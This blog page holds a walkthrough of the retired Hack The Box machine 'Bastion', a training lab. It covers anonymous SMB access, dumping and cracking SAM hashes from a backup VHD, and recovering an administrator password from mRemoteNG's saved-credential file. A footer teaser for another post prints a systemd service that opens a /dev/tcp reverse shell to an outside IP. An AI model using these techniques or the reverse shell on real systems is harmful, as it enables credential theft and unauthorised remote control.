Skip to main content

Hackthebox.eu - Retired - Bastion


Hackthebox.eu - Retired - Bastion




Recon

As always I start with just a simple up/down scan on all TCP ports to see what is open.

$ nmap -T4 -p- -oX ./nmapb.xml bastion.htb

Then I convert that to HTML to  make it pretty


That is a lot of open ports lets scan again with the -A switch on just the open ports

$ nmap -T4 -A -p22,135,139,445,5985,47001,49664,49665,49666,49667,49668,49669,49670 -oX ./nmapf.xml bastion.htb

Then I convert that to HTML too
$ xsltproc ./nmapf.xml -o ./nmapf.html


So Let's look.

Looks like we have a windows box with openssh on port 22 netbios/smb on139/445 and winRM on the rest of the open ports

No website to attack.. That's different.

Lets see what shares are on
$ smbclient -L \\bastion.htb

Cool we can see some shares with an anonymous connection
$ smbclient -L \\bastion.htb

Let's see if we can connect to any of them. Backups sounds tasty let's try that first


Cool

We get a nice note about the VPN link being slow in note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

Under Windows image backup there is a folder that looks like the backup for a computer called

L4mpje-pc

Exploit


I started to use mget to download the file but that was going to take forever.. That note we found might actually be for us to think of a different way to look at the backup file

I thought about it for a bit and decided to just mount the share to my local box to look at the files

I created a folder name mount

/Desktop/HTB/bastion/mount$ sudo mount -t cifs //bastion.htb/Backups ./ -o user=""

And mounted the drive

Here is a blog that walks you through the process

Once I had the VHD loaded I poked around for any interesting files and didn't find anything.. So I decided to grab the sam and security files to see if we can break the hashes.

These are the windows equivalent of the passwd and shadow files in Linux systems.

They hold the hashes for the user accounts on a windows box. Normally they are protected and you can't access them while the machine is running, but they are easy to steal from a VHD.

You can get them from the \windows\system32\config folder

I just copied them to my working folder on my local machine

 cp ./SAM /home/circusmonkey/Desktop/HTB/bastion/
 cp SYSTEM /home/circusmonkey/Desktop/HTB/bastion/

I then used sam2dump to write them to another file, this process is similar to combining the passwd and shadow files before you throw them at your favorite cracker.

Sam2dump Security Sam > hashes.txt

I chose hashcat to try and break the hash

$ hashcat -m 1000 -a 0 /home/circusmonkey/Desktop/HTB/bastion/hash.txt /home/circusmonkey/rockyou.txt --force

Pretty quickly we got this result



bureaulampje


Cool so 
username:    l4mpje
Password:    bureaulampje

Let's see if we can ssh with these creds



We got a shell!!!

Because Science GIF





We got the user hash


Doing simple enumeration after this part leads us to a program installed called mRemoteNG

Which is a tabbed connection manager for RDP,SSH and other protocols.
One of the features it allows for within the program is the saving of credentials. You know, so you don't have to actually type in your password when connecting to services.

The passwords are saved in a XML file called confCons.xml located in ther user appdata roaming folder…

I wonder if there is one present on this system?

Good news everybody

Dr. Nick Riviera Hello GIF by The Simpsons

Let's check it out



This looks like a saved connection credentials for RDP to the local machine as the administrator account….

I found a bunch of blog posts online about how to try and decrypt this. They all seemed like a lot of work :)

I found another post about how from the gui for the program you can basically just echo out the save credential… that is the route I'm going to try

I just need to install the program, copy over the xml and out should pop the administrator password.


I had a bunch of errors with the way the xml copied and pasted over to my windows VM. I had to correct a bunch of added spacing but eventually I got it to load the XML… I also only copied over the connection for the Administrator RDP session.


Then I created the external tool mentioned in the blog to echo out the password.


Then just a simple right click on the dc
External tools and New external tool

What is most likely the administrator password


thXLHM96BeKL0ER2


Yes it was

Let's get that hash


administrator@BASTION C:\Users\Administrator\Desktop>type root.txt                                                               
9588***********************************


Bye-Bye Everybody

Season 7 Waves GIF




































Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more